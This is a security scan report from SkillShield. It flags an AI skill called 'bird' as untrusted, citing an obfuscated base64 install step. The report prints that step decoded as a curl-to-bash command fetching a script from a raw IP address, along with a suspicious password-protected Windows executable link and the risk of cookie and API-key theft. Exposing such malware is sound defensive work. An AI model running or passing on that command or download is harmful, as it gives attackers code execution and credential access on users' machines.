Trust Assessment
bird received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 4 findings: 2 critical, 2 high, 0 medium, and 0 low severity. Key findings include Obfuscated execution: base64 decode to shell, Obfuscated Remote Code Execution via `curl | bash` from untrusted IP, Untrusted External Executable Download for Windows Installation.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 40/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings4
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/bird-0p/SKILL.md:10 | |
| CRITICAL | Obfuscated Remote Code Execution via `curl | bash` from untrusted IP The MacOS installation instructions include a base64-encoded command that decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"`. This command downloads and executes an arbitrary shell script from an unknown and untrusted IP address (`91.92.242.30`) directly into the user's shell. This constitutes a severe command injection vulnerability, a critical supply chain risk due to the untrusted source and dynamic content, and uses obfuscation (base64) to hide the malicious intent. The downloaded script can perform any action on the user's system, including data exfiltration, credential harvesting, or installing malware. Remove the malicious installation command. Provide a secure, verifiable, and transparent installation method, preferably through official package managers or signed binaries. Avoid `curl | bash` from untrusted or dynamic sources. | LLM | SKILL.md:12 | |
| HIGH | Untrusted External Executable Download for Windows Installation The Windows installation instructions direct users to download a `.zip` file from a GitHub release (`https://github.com/syazema/OpenClawProvider/releases/download/win/OpenClawProvider-1.0.2.zip`) and run an executable from it. While GitHub is a common platform, the `syazema` user is not necessarily the official OpenClaw organization, and the content of the executable is not verified. The use of a password (`openclaw`) for the archive is also unusual and does not add security. This poses a significant supply chain risk as a malicious or compromised executable could be distributed, leading to arbitrary code execution. Provide a secure and verifiable installation method. If an external executable is necessary, ensure it is signed, distributed from an official and trusted source, and ideally, its integrity can be verified (e.g., via checksums). Clearly state the provenance of the `OpenClawProvider` and its relationship to the skill. | LLM | SKILL.md:8 | |
| HIGH | Skill Designed to Access Sensitive Authentication Data The skill explicitly states it uses "Browser cookies (default: Firefox/Chrome)" and `SWEETISTICS_API_KEY` for authentication. While this is necessary for its stated functionality, the presence of the critical command injection vulnerability (as identified in the MacOS installation instructions) means that a malicious actor could leverage the skill's access to these sensitive credentials. The downloaded script could easily be designed to exfiltrate browser cookies or the `SWEETISTICS_API_KEY` if it were set as an environment variable. Address the underlying command injection and supply chain risks first. Implement robust security practices within the skill to handle and protect sensitive credentials. Clearly document how credentials are used and stored, and ensure they are not unnecessarily exposed. | LLM | SKILL.md:31 |
Scan History
Embed Code
[](https://skillshield.io/report/21723c6fcf49c16a)
Powered by SkillShield